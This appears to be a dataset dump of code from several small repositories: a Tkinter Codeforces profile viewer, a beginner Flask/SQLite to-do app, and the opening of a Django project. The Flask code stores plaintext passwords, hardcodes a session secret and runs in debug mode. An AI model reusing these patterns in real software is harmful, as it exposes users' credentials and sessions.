b8f200819616137a7629aa9b54e02eef43218a0f
a6a0b65056c15723eaea919234747756d614b29e
38c00db4acfb6a43a45b2b8846b3ec22ac2eea8a
refs/heads/master
2020-11-28T22:56:37.182304
2019-12-24T13:34:48
2019-12-24T13:34:48
229,942,750
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7083333134651184, "alphanum_fraction": 0.7916666865348816, "avg_line_length": 15, "blob_id": "8a7abc710f01731e24676e80d2ed814102fcd207", "content_id": "65ad24a1797cc801196370559ea890cbe73c0bc0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 48, "license_type": "permissive", "max_line_length": 24, "num_lines": 3, "path": "/README.md", "repo_name": "l-yc/codeforces-scrapper", "src_encoding": "UTF-8", "text": "# codeforces-scrapper\n\nGoogle Code-in 2019 Task\n" }, { "alpha_fraction": 0.7558139562606812, "alphanum_fraction": 0.7848837375640869, "avg_line_length": 42, "blob_id": "5cc4971f3cda513177c42d4a5a94f25c0a2f725e", "content_id": "871b6ee12f3623649797a1aa9ea0aaaf8c356af1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 172, "license_type": "permissive", "max_line_length": 69, "num_lines": 4, "path": "/build.sh", "repo_name": "l-yc/codeforces-scrapper", "src_encoding": "UTF-8", "text": "#!/bin/sh\ncp codeforces-scrapper.py LICENSE ~/rpmbuild/SOURCES/\nrpmbuild -ba codeforces-scrapper.spec\ncp ~/rpmbuild/RPMS/noarch/codeforces-scrapper-0.1-1.fc29.noarch.rpm .\n" }, { "alpha_fraction": 0.60601407289505, "alphanum_fraction": 0.6128182411193848, "avg_line_length": 34.0461540222168, "blob_id": "084cb8d28fc3aec8052a7b61c306af3cb565a502", "content_id": "07a7786133e8e9003fe9a443faebfe91bb9c63cf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4556, "license_type": "permissive", "max_line_length": 115, "num_lines": 130, "path": "/codeforces-scrapper.py", "repo_name": "l-yc/codeforces-scrapper", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom string import Template\nimport requests\nfrom tkinter import *\nfrom tkinter import ttk\nimport io\nfrom PIL import Image, ImageTk\n\n# API interface\nclass ScrapperException(Exception):\n '''raise 
this when there's a scrapper error'''\n\nclass Scrapper():\n api = Template('https://codeforces.com/api/$methodName')\n\n def __init__(self):\n pass\n\n def fetch_data(self, username):\n response = requests.get(Scrapper.api.substitute(methodName='user.info'), params={ 'handles': username })\n #print(response)\n data = response.json()\n if response and data['status'] == 'OK':\n return data['result'][0] # only take the first user\n else:\n raise ScrapperException('Error: User with the specified username does not exist.')\n\n def fetch_image(self, url):\n response = requests.get(url, stream=True)\n raw_data = response.raw.read()\n image = io.BytesIO(raw_data)\n return image\n\n\n# Tkinter GUI setup\nclass App():\n rating_template = Template('$rating (max: $max_rating)')\n rank_template = Template('$rank (max: $max_rank)')\n\n def __init__(self):\n self.scrapper = Scrapper()\n self.createUI()\n\n def createUI(self):\n self.root = Tk()\n self.root.title('Codeforces')\n\n # search\n self.form = ttk.Frame(self.root, padding=(16,16), borderwidth=8, relief='raised')\n self.form.pack(fill=X, anchor=N, expand=True)\n\n self.username_label = ttk.Label(self.form, text='Search username:')\n self.username_label.pack(side=LEFT, padx=8, pady=8)\n\n self.username = StringVar()\n self.username_entry = ttk.Entry(self.form, width=20, textvariable=self.username)\n self.username_entry.pack(side=LEFT, padx=8, pady=8)\n\n self.search_button = ttk.Button(self.form, text='Go', command=self.search)\n self.search_button.pack(side=RIGHT)\n\n # info\n self.info = ttk.Frame(self.root, padding=(16,16), borderwidth=8, relief='sunken')\n self.info.pack(fill=BOTH, expand=True)\n\n self.error_display = StringVar()\n self.error_label = ttk.Label(self.info, textvariable=self.error_display)\n self.error_label.grid(column=0, row=0, columnspan=2)\n\n self.avatar = None\n self.avatar_label = ttk.Label(self.info, image=self.avatar)\n self.avatar_label.grid(column=0, row=1, rowspan=3, padx=8)\n\n 
self.handle_display = StringVar()\n self.handle_label = ttk.Label(self.info, textvariable=self.handle_display)\n self.handle_label.grid(column=1, row=1, sticky='w')\n\n self.rating_display = StringVar()\n self.rating_label = ttk.Label(self.info, textvariable=self.rating_display)\n self.rating_label.grid(column=1, row=2, sticky='w')\n\n self.rank_display = StringVar()\n self.rank_label = ttk.Label(self.info, textvariable=self.rank_display)\n self.rank_label.grid(column=1, row=3, sticky='w')\n\n def search(self):\n try:\n data = self.scrapper.fetch_data(self.username.get())\n #print(data)\n self.error = None;\n image = self.scrapper.fetch_image('https:' + data['avatar'])\n self.avatar = ImageTk.PhotoImage(Image.open(image))\n self.handle = data['handle']\n self.rating = data['rating']\n self.rank = data['rank']\n self.max_rating = data['maxRating']\n self.max_rank = data['maxRank'] \n except ScrapperException as e:\n #print(e)\n self.error = e\n except requests.exceptions.ConnectionError as e:\n #print(e)\n self.error = 'Error: You are not connected to the internet.'\n self.updateUI()\n\n def updateUI(self):\n if self.error is None:\n self.error_label.grid_remove()\n self.avatar_label.configure(image=self.avatar)\n self.handle_display.set(self.handle)\n self.rating_display.set(App.rating_template.substitute(rating=self.rating, max_rating=self.max_rating))\n self.rank_display.set(App.rank_template.substitute(rank=self.rank, max_rank=self.max_rank))\n else:\n self.error_display.set(self.error)\n self.error_label.grid()\n self.avatar_label.configure(image='')\n self.handle_display.set('')\n self.rating_display.set('')\n self.rank_display.set('')\n\n def run(self):\n self.root.mainloop()\n\n\ndef main():\n App().run()\n\n\nif __name__ == '__main__':\n main()\n" } ]
3
coderkat/sql---flask
https://github.com/coderkat/sql---flask
7ffac861c092afddb68cee69e246dc26c08034fe
202b7028def487b29e08776cef92f8b9e070f8f0
592299f481f88a604856177ae876334565b6822d
refs/heads/master
2016-09-11T02:28:52.329578
2013-03-27T02:58:48
2013-03-27T02:58:48
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6074766516685486, "alphanum_fraction": 0.6181575655937195, "avg_line_length": 36.5, "blob_id": "c4f943f2c39990edfd865bf0d1d6501d6adc7293", "content_id": "9f23ccb85b79fab3a509c90100be88711af1b143", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 749, "license_type": "no_license", "max_line_length": 97, "num_lines": 20, "path": "/templates/change_task.html", "repo_name": "coderkat/sql---flask", "src_encoding": "UTF-8", "text": "{% extends \"header.html\" %}\n{% block title %}Edit Task{% endblock %}\n\n{% block content %}\t\n\n\t<h1>Edit a task</h1>\n\n<!-- TODO: figure out how to pre-populate fields w/existing values\n -->\t\n \t<form name=\"change_task\" action=\"{{ url_for('save_changes') }}\" method=\"post\">\n \t\tTask id*: <input type=\"text\" value=\"{{ task_id }}\" name=\"task_id\"><br />\n \t\t<!-- Tried disabling this field, got screwy url call -->\n\t\tTask title*: <input type=\"text\" value=\"{{ title}}\" name=\"task_title\"><br />\n\t\tTask description: <input type=\"text\" value=\"{{'description'}}\" name=\"task_description\"><br />\n\t\tTask due date (MM-DD-YY): <input type=\"text\" value=\"{{'03-28-13'}}\" name=\"task_due_date\"><br />\n\t\t<input type=\"submit\" value=\"Change a task\">\n\t</form>\n\n\n{% endblock %}" }, { "alpha_fraction": 0.610909104347229, "alphanum_fraction": 0.6115151643753052, "avg_line_length": 32.67346954345703, "blob_id": "d00c85313f2575eaf7fd1146318bac6b1b73f758", "content_id": "620582b985d2c4cb3aeb3e262de76f61fdee06c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3300, "license_type": "no_license", "max_line_length": 204, "num_lines": 98, "path": "/model.py", "repo_name": "coderkat/sql---flask", "src_encoding": "UTF-8", "text": "import sqlite3\nimport datetime\n\ndef connect_db():\n\treturn sqlite3.connect(\"taskapp.db\")\n\ndef new_user(db, email, password, first_name, last_name):\n 
c = db.cursor()\n query = \"\"\"INSERT INTO Users VALUES (NULL, ?, ?, ?, ?)\"\"\"\n result = c.execute(query, (email, password, first_name, last_name))\n db.commit()\n return result.lastrowid\n\ndef authenticate(db, username, password):\n c = db.cursor()\n query = \"\"\"SELECT * FROM Users WHERE email = ? AND password = ?\"\"\"\n c.execute(query, (username, password))\n row = c.fetchone()\n if row:\n fields = ['id', 'email', 'password', 'first_name', 'last_name']\n return dict(zip(fields, row)) # this returns a dictionary where the keys are the fields and the values are what's returned from the DB. zip attached two lists together.\n\n return None\n\ndef get_user(db, user_id):\n c = db.cursor()\n user_id = str(user_id)\n query = \"\"\"SELECT * FROM Users WHERE id = ?\"\"\"\n c.execute(query, (user_id))\n row = c.fetchone()\n if row:\n fields = ['id', 'email', 'password', 'first_name', 'last_name']\n return dict(zip(fields, row))\n\n return None\n\ndef new_task(db, title, description, due_date, user_id):\n timestamp = datetime.datetime.today()\n user_id = str(user_id)\n c = db.cursor()\n query = \"\"\"INSERT into Tasks VALUES (NULL, ?, ?, ?, ?, NULL, ?)\"\"\"\n result = c.execute(query, (title, description, timestamp, due_date, user_id))\n db.commit()\n return result.lastrowid\n\ndef change_task(db, task_title, task_description, task_due_date, task_id):\n c = db.cursor()\n query = \"\"\"UPDATE Tasks SET title = ?, description = ?, due_date = ? WHERE id = ?\"\"\"\n c.execute(query, (task_title, task_description, task_due_date, task_id))\n db.commit()\n return\n\ndef complete_task(db, task_id):\n timestamp = datetime.datetime.today()\n task_id = str(task_id)\n c = db.cursor()\n query = \"\"\"UPDATE Tasks SET completed_at = ? 
WHERE id = ?\"\"\"\n c.execute(query, (timestamp, task_id))\n db.commit()\n return\n\n# get tasks by user or get all tasks by all users\ndef get_tasks(db, user_id): \n c = db.cursor()\n \n if user_id:\n user_id = str(user_id)\n query = \"\"\"SELECT * FROM Tasks WHERE user_id = ?\"\"\"\n c.execute(query, (user_id))\n else:\n query = \"\"\"SELECT * FROM Tasks\"\"\"\n c.execute(query)\n\n rows = c.fetchall()\n\n if rows:\n fields = ['id', 'title', 'description', 'created_at', 'due_date', 'completed_at', 'user_id']\n tasks = []\n for row in rows:\n task = dict(zip(fields, row))\n tasks.append(task) #adds in dictionary as an item in the list, will end up with a list of dictionaries\n\n return tasks #we return a list of dictionaries so that later we can use the keys in the dict as attributes when displaying variables in the HTML templates or just pull values through keys directly\n\n return None\n\n# get single task by task ID\ndef get_task(db, task_id):\n c = db.cursor()\n task_id = str(task_id)\n query = \"\"\"SELECT * FROM Tasks WHERE id = ?\"\"\"\n c.execute(query, (task_id))\n row = c.fetchone()\n if row:\n fields = ['id', 'title', 'description', 'created_at', 'due_date', 'completed_at', 'user_id']\n return dict(zip(fields, row))\n\n return None\n" }, { "alpha_fraction": 0.6937969326972961, "alphanum_fraction": 0.704859733581543, "avg_line_length": 34.654930114746094, "blob_id": "7073525b4551a4d064879addc041c392ee398d4f", "content_id": "7d9efa8dff4c470df0782a3f5b78923a519ed05d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5062, "license_type": "no_license", "max_line_length": 186, "num_lines": 142, "path": "/tipsy.py", "repo_name": "coderkat/sql---flask", "src_encoding": "UTF-8", "text": "from flask import Flask, flash, session, render_template, request, redirect, url_for, g\nimport model # our other Python file that has the SQL query functions\nimport urllib # used for URL encoding\nimport re # to do 
regex date validation\n\napp = Flask(__name__) # make a new instance of the Flask class\napp.secret_key = 'some_secret'\n\n# function that we can call before each view is executed\[email protected]_request\ndef set_up_db():\n\tg.db = model.connect_db() # global variable, db\n\n# function to close db connection after each view is rendered\[email protected]_request\ndef close_db(e): # e is to allow this function to still be called even if some error happens\n\tg.db.close()\n\n# a decorated function aka a 'view'\[email protected](\"/\") # this is the decorate that tells Flask what URL/route is attached to this index function, i.e. maps URL to function\ndef index():\n\treturn render_template(\"index.html\") # the return value that's sent back to the browser as read from our index html file\n\n# login page\[email protected]('/login')\ndef login():\n\treturn render_template(\"login.html\")\n\n# verifying login credentials\[email protected]('/authenticate', methods=[\"POST\"])\ndef authenticate():\n\temail = request.form['username']\n\tpassword = request.form['password']\n\n\tuser_info = model.authenticate(g.db, email, password)\n\n\t# if credentials are wrong or incomplete\n\tif not user_info:\n\t\tflash(\"Incorrect username or password\")\n\t\treturn redirect(url_for(\"login\"))\n\n\telse: # adding user info into session dictionary to pull out and use later\n\t\tsession['user_id'] = user_info['id']\n\t\tsession['username'] = user_info['email']\n\t\treturn redirect(url_for(\"index\"))\n\[email protected]('/logout')\ndef logout():\n\t# remove existing username from session\n\tsession.pop('username', None)\n\tsession.pop('user_id', None)\n\tflash(\"Successfully logged out!\")\n\treturn redirect(url_for('index'))\n\[email protected](\"/tasks\")\ndef list_tasks():\n\t#TODO: Make another thing that returns everything nessecary for this view, by using a join instead of having python do multiple queries.\n\ttasks_from_db = model.get_tasks(g.db, None) # this returns a list of 
dictionaries\n\n\tfor dicts in tasks_from_db:\n\t\tfor key in (\"title\", \"description\"):\n\t\t\tdicts[key] = urllib.unquote(dicts[key])\n\n\treturn render_template(\"list_tasks.html\", tasks=tasks_from_db)\n\[email protected](\"/new_task\")\ndef new_tasks():\n\tif 'username' not in session:\n\t\tflash(\"You must be logged in to create a new task for yourself.\")\n\t\treturn redirect(url_for(\"index\"))\n\n\telse:\n\t\treturn render_template(\"new_task.html\")\n\[email protected](\"/save_task\", methods=[\"POST\"]) # this url will respond to posted forms rather than just get url requests\ndef save_task():\n\ttask_title = urllib.quote(request.form['task_title']) # request object representing state of user browser, contents from form are put into dictionary on the 'request' object\n\t# encoding all input\n\n\t# check for title in task form: if none, flash error & redirect\n\tif not task_title:\n\t\tflash(\"You must enter a title for your task\")\n\t\treturn redirect(url_for('new_tasks'))\n\t\n\ttask_description = urllib.quote(request.form['task_description'])\n\t\n\ttask_due_date = urllib.quote(request.form['task_due_date'])\n\t\n\t# using regex to check that date is in format of MM-DD-YY [1-12]-[1-31]-[13-99]\n\tdate_comparison = re.match(r'^((0[0-9])|(1[0-2]))-((0[1-9])|(1|2)[0-9]|(3[0|1]))-((1[3-9])|([2-9][0-9]))', task_due_date)\n\t\n\tif date_comparison:\n\t\t# set new task specific to user_id\n\t\ttask_id = model.new_task(g.db, task_title, task_description, task_due_date, session['user_id'])\n\t\treturn redirect(url_for('list_tasks'))\n\n\telse:\n\t\tflash(\"Your date is not in the right format!\") #flashing system basically makes it possible to record a message at the end of a request and access it next request and only next request\n\t\treturn redirect(url_for('new_tasks'))\n\[email protected](\"/task_complete\", methods=[\"POST\"])\ndef complete_task():\n\ttask_id = request.form['task_id']\n\tmodel.complete_task(g.db, task_id)\n\tflash(\"Marked task #\" + 
task_id + \" as complete!\")\n\treturn redirect(url_for('list_tasks'))\n\[email protected](\"/change_task/<int:id>\", methods=[\"GET\"])\ndef change_task(id):\n\treturn render_template(\"change_task.html\", task_id=id)\n\n\[email protected](\"/save_changes\", methods=[\"POST\"])\n# TODO: Solve id kerfuffle\ndef save_changes():\n\ttask_title = urllib.quote(request.form['task_title']) \n\n\t# follows formatting for save_task \n\tif not task_title:\n\t\tflash(\"You must enter a title for your task\")\n\t\treturn redirect(url_for('change_task'))\n\t\n\ttask_description = urllib.quote(request.form['task_description'])\n\n\ttask_id = request.form['task_id']\n\n\ttask_due_date = urllib.quote(request.form['task_due_date'])\n\n\tdate_comparison = re.match(r'^((0[0-9])|(1[0-2]))-((0[1-9])|(1|2)[0-9]|(3[0|1]))-((1[3-9])|([2-9][0-9]))', task_due_date)\n\t\n\tif date_comparison:\n\t\ttask_change = model.change_task(g.db, task_title, task_description, task_due_date, task_id)\n \t\treturn redirect(url_for('list_tasks'))\n\n\n\telse:\n\t\tflash(\"Your date is not in the right format!\") \n\t\treturn redirect(url_for('change_task'))\n\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True) # start server in debug mode" }, { "alpha_fraction": 0.6695966720581055, "alphanum_fraction": 0.6933816075325012, "avg_line_length": 28.769229888916016, "blob_id": "2ff4bb9dc8f786ac7238ae713ca3608140637c0b", "content_id": "ecca01c9c1cd32ef9714c60f20bbc88aa8b1f561", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1934, "license_type": "no_license", "max_line_length": 178, "num_lines": 65, "path": "/notes.txt", "repo_name": "coderkat/sql---flask", "src_encoding": "UTF-8", "text": "DB design:\nUSERS\nid - int (primary key)\nemail - varchar(64)\npassword - varchar(64)\nfirst_name - varchar (64)\nlast_name - varchar (64)\n\nTASKS\nid - int (primary key)\ntitle - varchar(64)\ndescription - varchar(255)\ntitle created_at - datetime\ndue date - 
datetime\ncompleted_at - datetime\nuser_id - int (foreign key to USERS table)\n\n--------------------------------------------------\nCreate a task title and description\n- figure out how to sanitize data (URL encode) -- done!\n- require that date be in a certain format --done!\n- success msg then redirect to all tasks view OR error message of what's missing and go back to new task page -- done!!\n- create task assigned to logged in user -- done!\n\n- clean up URLs with url_for -- done!\n- reduce db call repetition -- done!\n\nEdit tasks\n- mark tasks as complete -- done!\n- change title, description, due date of task after creation\n\t(\"edit\" button on /tasks page, pulls up new page with pre-filled form for task selected: user can edit fields, \"submit\" button, alters task in sql (hang on to taskID somewhere))\n- delete tasks\n//\n- can't edit other people's tasks in any way\n- be able to only mark your own tasks as complete\n\nHomepage\n- log in as user (forms, sessions) OR just browse publicly --done!\n- Page to create new users\n- view all users of app\n\nOptions for Task List view\n- view only your tasks (includes private assigned to you)\n- view all tasks/users (except private tasks)\n- view tasks by user (search by username)\n- view tasks by status (completed or not) \"split completed tasks off from incomplete tasks (Jinja templates)\"\"\n\n\nSet task as private or public\n- new column in Tasks table\n- add to task creation page\n\nFurther functionality:\n- Sub-tasks\n- group tasks by project\n- Assign other users to your tasks?\n- admin user functionality\n- Multiple lists\n\n================\nMM-DD-YY\n\n[1-12]-[1-31]-[13-99]\n\n^((0[0-9])|(1[0-2]))-((0[1-9])|(1|2)[0-9]|(3[0|1]))-((1[3-9])|([2-9][0-9]))" } ]
4
DamonSnow/excelmd
https://github.com/DamonSnow/excelmd
7f8f8607acedb59f2b1dc74420514c7635fa9b03
5107cf578e60bdbf2fa6ae8f4df5765c53c35ec6
303af3866b518c51e7c870ae3bd402a27ad02c30
refs/heads/master
2020-03-25T15:34:33.771851
2018-08-07T15:06:00
2018-08-07T15:06:00
143,890,123
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5336266756057739, "alphanum_fraction": 0.5461973547935486, "avg_line_length": 27.428571701049805, "blob_id": "c3723f4f05dfdf38e0d671e4591684d8ebfd1936", "content_id": "306d3f4ddb02cefc7043bbbc99e9e9d6aa81fcd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1741, "license_type": "no_license", "max_line_length": 82, "num_lines": 56, "path": "/exceltomd.py", "repo_name": "DamonSnow/excelmd", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n#python\n#用于实现将excel文件转为markdown文件\n\nimport codecs\nimport xlrd\n\n\n\ndef excelToMd(origin_url,save_url,save_as):\n # 打开文件\n workbook = xlrd.open_workbook(origin_url)\n # 获取所有sheet\n # print(workbook.sheet_names()) # [u'sheet1', u'sheet2']\n # sheet2_name = workbook.sheet_names()\n\n # 根据sheet索引或者名称获取sheet内容\n sheet2 = workbook.sheet_by_index(0) # sheet索引从0开始\n # sheet2 = workbook.sheet_by_name('sheet2')\n md_url_file = '%s%s.md' % (save_url, save_as) # 文件名连接第一列和第二列\n file = codecs.open(md_url_file, 'w', \"utf-8\") # 写入文件名\n # sheet的名称,行数,列数\n # print(sheet2.name, sheet2.nrows, sheet2.ncols)\n rowfilter = []\n str = ''\n for i in range(0,sheet2.nrows):\n if i > 0:\n row = list(map(lambda x : '^' if x == '' else x,sheet2.row_values(i)))\n res = list(map(lambda x: x.replace('\\n', '<br/>'), row))\n rowfilter.append('|'.join(res))\n else:\n row = sheet2.row_values(i)\n res = list(map(lambda x: x.replace('\\n', '<br/>'), row))\n rowfilter.append('|'.join(res))\n split_str = '|---' * sheet2.ncols\n rowfilter.append(split_str)\n for i in rowfilter:\n if rowfilter.index(i) == 1:\n str = i + '|\\n'\n else:\n str = '|' + i + '|\\n'\n # print(str)\n file.write(str)\n file.close()\n\n\n\nif __name__ == '__main__':\n # 指定excel的地址\n excel_url = r'F:\\\\markdown\\\\control_plan.xlsx'\n\n # 指定mark文档输入地址\n\n md_url = 'F:\\\\markdown\\\\'\n save_as = 'control_plan'\n excelToMd(excel_url,md_url,save_as)" } ]
1
gugumice/barcode
https://github.com/gugumice/barcode
9edb6d2d52ed300f64fdb8f353f1d596831ae9f4
c129d1c5c596bca75115e2cd15adc147120ea4e0
87b95d858d8ce1c3e85fb37aa499fd9f59c07595
refs/heads/master
2020-03-24T21:03:08.209172
2020-01-08T05:09:33
2020-01-08T05:09:33
143,011,395
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7657004594802856, "alphanum_fraction": 0.7789855003356934, "avg_line_length": 25.70967674255371, "blob_id": "4aed7991ab132ca54dbe21cc4d9382910207d425", "content_id": "6562ad8e357be205f972a3c38a560b9567fafc2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 828, "license_type": "no_license", "max_line_length": 96, "num_lines": 31, "path": "/README.md", "repo_name": "gugumice/barcode", "src_encoding": "UTF-8", "text": "# barcode\nreads barcode from scanner (currently HT-300) and prints it on ZEBRA TLP-2824\nThis version tested on PiIII, RASPBIAN STRETCH LITE\nVersion:June 2018\n\nRequires CUPS, ZEBRA (https://pypi.org/project/zebra/)\nPYTHON\n- sudo pip install zebra pyserial\n\nhttps://drupalista.net/blog/raspberry-pi-install-printer-raspbian-lite\n\n$ sudo apt-get install\n\n! Cups-bsd is IMPORTANT for lpr to function\n\nCUPS printer setup:\n- sudo cupsctl --remote-admin --remote-anyifconfig\n- sudo usermod -a -G lpadmin pi\n\nAdd printer, choose ZEBRA\n- Set Make to RAW\n\nAuto run un startup:\n\n- sudo cp barcode.service /etc/systemd/system/barcode.service\n- sudo systemctl enable barcode.service\n\nDisable auto run:\n- sudo systemctl disable barcode.service\n\nIf more than one printer is configured in CUPS, script will ask which printer to use for labels.\n" }, { "alpha_fraction": 0.3922918140888214, "alphanum_fraction": 0.4099564254283905, "avg_line_length": 29.586956024169922, "blob_id": "450f43f7e48d6f456b9013d35f8e413c92b52aaf", "content_id": "48843fc1a47380e6833f3a682f0b6538f41c1a65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4359, "license_type": "no_license", "max_line_length": 120, "num_lines": 138, "path": "/barcode.py", "repo_name": "gugumice/barcode", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\r\nfrom zebra import zebra\r\nfrom string import Template\r\nimport logging, sys, socket, os\r\nimport 
serial\r\n\r\nprint os.path.dirname(os.path.abspath(sys.argv[0]))\r\n\r\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\r\n\r\nLBL_FILE='lblTemplate.txt'\r\nCOPIES=1\r\n\r\n#class for barcode reader\r\n\r\nclass bcr(object):\r\n def __init__(self, port='/dev/ttyACM0',\r\n timeout=1):\r\n self.bc=()\r\n try:\r\n self.fp=serial.Serial(port=port,timeout=timeout)\r\n except Exception as e:\r\n print('Canot open: {}\\n{}'.format(port,e))\r\n sys.exit(1)\r\n def readBC(self):\r\n buffer=self.fp.readline()\r\n return(buffer.strip('\\n'))\r\n\r\n#class for printing labels\r\n\r\nclass lbl(object):\r\n def __init__(self, queue=1):\r\n self.zebra=zebra()\r\n self.lblText=''\r\n try:\r\n self.zebra.setqueue(self.zebra.getqueues()[queue])\r\n except:\r\n logging.debug('Queue {} not found!'.format(queue))\r\n sys.exit(1)\r\n try:\r\n fl='{}/{}'.format(os.path.dirname(os.path.abspath(sys.argv[0])),LBL_FILE)\r\n with open(fl) as f:\r\n self.lblText=f.read()\r\n logging.debug('Reading from {}'.format(fl))\r\n except:\r\n logging.debug('Error reading from {}. 
Using defaults'.format(LBL_FILE))\r\n self.lblText='''\r\n\r\n^XA\r\n#label darkness 0-30\r\n~SD10\r\n#label offset width,height\r\n^LH20,10^MTT\r\n^FO0,0\r\n^AS\r\n^FDEGL^FS\r\n^FO0,35\r\n^AQ\r\n^FD$hostName ^FS\r\n^FO30,150\r\n^AS\r\n^FD$barCode^FS\r\n^FO0,65\r\n^GB200,2,2\r\n^FS\r\n^BY2,3,105\r\n^FT20,150\r\n^BCN,80,N,N\r\n^FD>;$barCode^FS\r\n^PQ$numCopies\r\n^XZ\r\n'''\r\n\r\n\r\n self.lblSave()\r\n\r\n def lblSave(self):\r\n try:\r\n with open(LBL_FILE,'w') as f:\r\n f.write(self.lblText)\r\n except:\r\n logging.debug('Cannot write to {}'.format(LBL_FILE))\r\n\r\n def lblPrint(self, barCode=\"12345678\", numCopies=1):\r\n t=Template(self.lblText)\r\n #print(self.__cleanBc(barCode))\r\n lblStr=t.substitute(hostName=socket.gethostname(), barCode=self.__cleanBc(barCode), numCopies=numCopies)\r\n self.zebra.output(lblStr)\r\n\r\n def __cleanBc(self, barCode):\r\n b=[]\r\n for s in barCode:\r\n if 32 <= ord(s) <=127:\r\n b += s\r\n return(\"\".join(b))\r\n\r\nif __name__ == '__main__':\r\n z=zebra()\r\n zQueues=z.getqueues()\r\n q=0\r\n i=0\r\n if(len(zQueues))==1:\r\n z.setqueue(zQueues[0])\r\n logging.debug('Printer: {}'.format(zQueues[0]))\r\n else:\r\n for q in zQueues:\r\n i+=1\r\n print('{}. 
{}'.format(i,q))\r\n try:\r\n q=input('Select printer ({}):'.format(i))\r\n except:\r\n q=i\r\n if not 0 <= q-1 <= i-1:\r\n print('{} - invalid option'.format(q))\r\n z=None\r\n sys.exit(1)\r\n print('<{}> selected'.format(zQueues[q-1]))\r\n lb=lbl(q-1)\r\n bc=bcr()\r\n done = False\r\n lblPref=''\r\n lblStr=''\r\n try:\r\n while not done:\r\n lblStr=(bc.readBC())\r\n if len(lblStr)>0:\r\n if lblStr[0]==\"#\":\r\n lblPref=lblStr[1:]\r\n lblStr=''\r\n else:\r\n #print('{}'.format(lblPref+lblStr))\r\n lb.lblPrint(lblPref+lblStr, COPIES)\r\n lblPref=''\r\n\r\n print('*')\r\n time.sleep(.5)\r\n except KeyboardInterrupt:\r\n print('Interrupted')\r\n" }, { "alpha_fraction": 0.5616196990013123, "alphanum_fraction": 0.5713028311729431, "avg_line_length": 26.047618865966797, "blob_id": "00c3bc3973b590cc7ccb882d6e410e00985633d1", "content_id": "dfc5bc59b6c57a5d3e648c0a48a45fb1ce283258", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1136, "license_type": "no_license", "max_line_length": 64, "num_lines": 42, "path": "/t1.py", "repo_name": "gugumice/barcode", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nfrom queue import Queuequeue.LifoQueue\nfrom threading import Thread, Event\nfrom time import sleep\nfrom random import randint\n# A thread that produces data\ndef producer(out_q):\n while True:\n data=randint(1,51)\n print(data)\n sleep(.2)\n # Make an (data, event) pair and hand it to the consumer\n if data == 5:\n print('data sent {}'.format(data))\n evt = Event()\n out_q.put((data, evt))\n # Wait for the consumer to process the item\n evt.wait()\n# A thread that consumes data\ndef consumer(in_q):\n print('consumer waiting')\n while True:\n # Get some data\n data, evt = in_q.get()\n # Process the data\n \n print('Data received {}'.format(data))\n sleep(5)\n # Indicate completion\n evt.set()\ndef main():\n #q = Queue.LifoQueue(maxsize=1)\n q = Queue.LifoQueue()\n t1 = Thread(target=consumer, args=(q,))\n 
t2 = Thread(target=producer, args=(q,))\n t1.start()\n t2.start()\nif __name__==\"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n pass\n" } ]
3
Javad2383/doctor
https://github.com/Javad2383/doctor
41b7d11ef9d35409c9181b13ffc471560c5cd558
0bd1e6d7be0af4becd2832f571b6315a5fa43de1
2ce90eec315a823de8355918ee062b3479d77473
refs/heads/master
2023-06-16T13:30:51.993806
2021-07-11T14:55:37
2021-07-11T14:55:37
384,974,579
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7037037014961243, "alphanum_fraction": 0.7037037014961243, "avg_line_length": 21.33333396911621, "blob_id": "6fddcecf1609372b72d0c66ade771133cdf97a63", "content_id": "6f26f02432367f1f3a115312b81be8c5d0f4968c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 135, "license_type": "no_license", "max_line_length": 53, "num_lines": 6, "path": "/site_views/views.py", "repo_name": "Javad2383/doctor", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\n\n\ndef site_index(request):\n context = {}\n return render(request, \"pgs/index.html\", context)\n\n" }, { "alpha_fraction": 0.744966447353363, "alphanum_fraction": 0.744966447353363, "avg_line_length": 23.83333396911621, "blob_id": "f08d257bc54a08280656c8a6ce584c59f046fd7f", "content_id": "5d08a1392cc4aad6490c0a0a5494fe2246010e9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 149, "license_type": "no_license", "max_line_length": 56, "num_lines": 6, "path": "/site_user/apps.py", "repo_name": "Javad2383/doctor", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass SiteUserConfig(AppConfig):\n default_auto_field = 'django.db.models.BigAutoField'\n name = 'site_user'\n" }, { "alpha_fraction": 0.748344361782074, "alphanum_fraction": 0.748344361782074, "avg_line_length": 24.16666603088379, "blob_id": "6074728799404a67c732997e26f81feacab5d2d5", "content_id": "9a110dafe991cc279d525f6b4a6552936c402fef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 56, "num_lines": 6, "path": "/site_views/apps.py", "repo_name": "Javad2383/doctor", "src_encoding": "UTF-8", "text": "from django.apps import 